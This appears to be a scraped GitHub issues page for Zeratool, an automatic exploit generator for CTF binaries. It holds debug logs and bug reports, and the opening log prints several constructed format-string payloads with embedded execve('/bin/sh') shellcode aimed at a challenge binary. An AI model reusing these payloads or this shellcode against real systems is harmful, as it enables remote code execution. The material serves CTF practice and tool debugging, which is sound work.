.trace is deprecated: please use .descriptions
Process with PID 13977 started...
= attach 13977 13977
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting __libc_start_main at 0x8049750
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'P\x97\x04\x08R\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'P\x97\x04\x08R\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14039 started...
= attach 14039 14039
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Found symbolic buffer at position 0 of length 0
[-] Value at stack offset 3 not a pointer
[+] Found symbolic buffer at position 0 of length 49
[+] Overwiting __gmon_start__ at 0x8049734
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'4\x97\x04\x086\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'4\x97\x04\x086\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14103 started...
= attach 14103 14103
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting stdin at 0x8049760
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'`\x97\x04\x08b\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'`\x97\x04\x08b\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14165 started...
= attach 14165 14165
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting exit at 0x804974c
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'L\x97\x04\x08N\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'L\x97\x04\x08N\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14227 started...
= attach 14227 14227
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting printf at 0x8049744
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'D\x97\x04\x08F\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'D\x97\x04\x08F\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14289 started...
= attach 14289 14289
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting fgets at 0x8049748
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'H\x97\x04\x08J\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'H\x97\x04\x08J\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14352 started...
= attach 14352 14352
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting __libc_start_main at 0x8049750
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'P\x97\x04\x08R\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'P\x97\x04\x08R\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14414 started...
= attach 14414 14414
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
Suggestion
What do you think about the vagrant env, and I can't install the Zeratool correctly.
So I Hope You Can Add One Vagrantfile,Thank You A Lot.
Why can't statically compiled programs to AEG? The program is killed halfway through running.
Why can't statically compiled programs to AEG? The program is killed halfway through running.
ERROR: Cannot open 'dbg:///home/panghu/Desktop/Zeratool/challenges/ret' for writing
root@ubuntu:~/Desktop/Zeratool/bin# python zerapwn.py ../challenges/ret
INFO | 2023-03-14 07:54:10,515 | pyvex.lifting.util.lifter_helper | Trying RDMSR
INFO | 2023-03-14 07:54:10,515 | pyvex.lifting.util.lifter_helper | Trying XGETBV
INFO | 2023-03-14 07:54:10,515 | pyvex.lifting.util.lifter_helper | Trying AAD
INFO | 2023-03-14 07:54:10,515 | pyvex.lifting.util.lifter_helper | Trying AAM
INFO | 2023-03-14 07:54:10,528 | main | [+] Checking pwn type...
INFO: Analyze all flags starting with sym. and entry0 (aa)
INFO: Analyze all functions arguments/locals (afva@@@f)
INFO: Analyze function calls (aac)
INFO: Analyze len bytes of instructions for references (aar)
INFO: Finding and parsing C++ vtables (avrr)
INFO: Type matching analysis for all functions (aaft)
INFO: Propagate noreturn information (aanr)
INFO: Use -AA or aaaa to perform additional experimental analysis
INFO | 2023-03-14 07:54:10,596 | zeratool.winFunctionDetector | [+] Found win function sym.win
INFO | 2023-03-14 07:54:10,596 | main | [+] Checking for overflow pwn type...
INFO | 2023-03-14 07:54:14,092 | zeratool.simgr_helper | Found vulnerable state.
INFO | 2023-03-14 07:54:14,121 | zeratool.simgr_helper | [+] Vulnerable path found b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00CCCC\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
INFO | 2023-03-14 07:54:14,121 | zeratool.simgr_helper | [+] Offset to bytes : 80
INFO | 2023-03-14 07:54:14,121 | main | [+] Getting binary protections
INFO | 2023-03-14 07:54:14,141 | main | [+] Exploiting overflow
ERROR: Cannot open 'dbg:///home/panghu/Desktop/Zeratool/challenges/ret' for writing
Traceback (most recent call last):
File "/home/panghu/.local/lib/python3.8/site-packages/r2pipe/open_sync.py", line 80, in init
self.process.stdin.write(("?V\n").encode("utf8"))
BrokenPipeError: [Errno 32] Broken pipe
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "zerapwn.py", line 246, in
main()
File "zerapwn.py", line 180, in main
properties["pwn_type"]["results"] = overflowExploiter.exploitOverflow(
File "/home/panghu/.local/lib/python3.8/site-packages/zeratool/overflowExploiter.py", line 131, in exploitOverflow
reg_values = getRegValues(binary_name, start_addr)
File "/home/panghu/.local/lib/python3.8/site-packages/zeratool/radare_helper.py", line 11, in getRegValues
r2 = r2pipe.open(filename, flags=["-d"])
File "/home/panghu/.local/lib/python3.8/site-packages/r2pipe/open_sync.py", line 88, in init
raise Exception("ERROR: Cannot open %s" % filename)
Exception: ERROR: Cannot open /home/panghu/Desktop/Zeratool/challenges/ret
root@ubuntu:~/Desktop/Zeratool/bin#
All attempts (including samples) result in "Can not determine vulnerable type"
# python zeratool.py -v challenges/easy_format
[+] Checking pwn type...
[+] Checking for overflow pwn type...
[+] Checking for format string pwn type...
[+] Found symbolic buffer at position 0 of length 49
[+] Found symbolic buffer at position 0 of length 49
[+] Found symbolic buffer at position 0 of length 49
[+] Found symbolic buffer at position 0 of length 49
[+] Found symbolic buffer at position 0 of length 49
[+] Getting binary protections
Cannot analyze at 0x08048430
Cannot analyze at 0x08048430
[+] Found win function main
[-] Can not determine vulnerable type```
(Running on Kali 2019.3)
Can not determine vulnerable type from ./sample.sh
I tried to run the sample but got this.
$ ./samples.sh
[+] Checking pwn type...
[+] Checking for overflow pwn type...
[+] Checking for format string pwn type...
[+] Getting binary protections
[+] Found win function sym.win
[-] Can not determine vulnerable type
Angr 8 and python3 pwntools support
Hi,
it would be nice to support version 8.x of Angr, about pwntools, the "python3-pwntools" package for python3 already exists, so it could be updated.
The only problem is that there have been changes in the Angr API and that adapt the code, someone can help?
formatDetector.py-Error
handle_connect = p.loader.main_object.get_symbol('handle_connection')
state = p.factory.entry_state(addr=handle_connect.rebased_addr)
- Error : handle_connect != handle_connection
Format Detector
zerapwn.py ./vuln --format_only
Traceback (most recent call last):
File "/home/obrad/.local/bin/zerapwn.py", line 246, in <module>
main()
File "/home/obrad/.local/bin/zerapwn.py", line 133, in main
properties["pwn_type"] = formatDetector.checkFormat(
File "/home/obrad/.local/lib/python3.10/site-packages/zeratool/formatDetector.py", line 81, in checkFormat
if "input" in end_state.globals.keys():
AttributeError: 'NoneType' object has no attribute 'globals'
Used on picoCTF flag leak challenge
https://play.picoctf.org/practice/challenge/269?category=6&page=1&search=flag%20le
Null bytes in exploit
I noticed that the majority of the exploits generated ( by Zeratool i.e. angr ) contain a null bytes in them, does this work for you ? AFAK this will break the exploit and prevent delivering the full payload if the function is expecting a null terminated input.
( sorry for asking such trivial question but i was wondering how this is working with all the null bytes that we see in the generated exploits )
b64decode TypeError: Incorrect padding
I use the sample script, but failed. The output is following:
(zeratool) test@ubuntu:~/tools/Zeratool$ python zeratool.py challenges/ret -u ctf.hackucf.org -p 9003
[+] Checking pwn type...
[+] Checking for overflow pwn type...
[+] Vulnerable path found '0000000000000000000000000p00000000000000000000000000000000000000\xef\xbe\xad\xde000000000000AAAA000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
[+] Triggerable with STDIN : '0000000000000000000000000p00000000000000000000000000000000000000\xef\xbe\xad\xde000000000000AAAA000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
[+] Getting binary protections
Traceback (most recent call last):
File "zeratool.py", line 80, in
main()
File "zeratool.py", line 61, in main
properties['win_functions'] = winFunctionDetector.getWinFunctions(args.file)
File "/home/test/tools/Zeratool/lib/winFunctionDetector.py", line 34, in getWinFunctions
decoded_value = base64.b64decode(value)
File "/usr/lib/python2.7/base64.py", line 78, in b64decode
raise TypeError(msg)
TypeError: Incorrect padding
Any way, my ubuntu is 16.04.
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.